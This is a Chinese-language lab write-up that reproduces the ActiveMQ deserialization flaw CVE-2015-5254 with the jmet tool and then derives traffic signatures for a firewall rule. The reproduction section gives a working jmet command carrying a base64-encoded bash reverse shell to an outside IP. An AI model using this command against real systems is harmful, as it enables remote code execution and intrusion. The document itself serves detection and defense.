ActiveMQ 反序列化漏洞（CVE-2015-5254）特征分析

介绍

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

复现

1.Vulhub搭建好后对8161端口主页面进行访问

 2.从github上下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

3.执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuOTIuMy4xNTYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.130.161 61616

调用java -jar 运行 jmet的jar包，-Q是插入一个名为event的队列，-I 是选择装载ActiveMQ模块 -s 是选择ysoserial payload -Y 是攻击模式和内容 -Yp 是选择攻击利用链，这是选择是ROME， 之后带上IP加端口。

4.模拟管理员访问/admin/browse.jsp?JMSDestination=event 登录

登录后会看到请求

5.nc进行监听

6.当管理员点击后，会执行命令

 7.收到回话，反弹shell成功

 特征分析

1.抓取数据包查看tcp流

2.java -jar 运行 jmet的jar包时像服务器发送数据

需要 -I 来指定装载ActiveMQ模块，所以tcp流中会有ActiveMQ关键字

3.jmet原理是使用ysoserial生成Payload并发送，所以会有ysoserial/payloads关键字。

下面是执行的反弹shell的命令

 

综上所述：CVE-2015-5254特征为tcp流数据中包括 ActiveMQ 和 ysoserial/payloads 关键字

规则测试

重新执行jmet

管理员这里并没有增加

防火墙成功拦截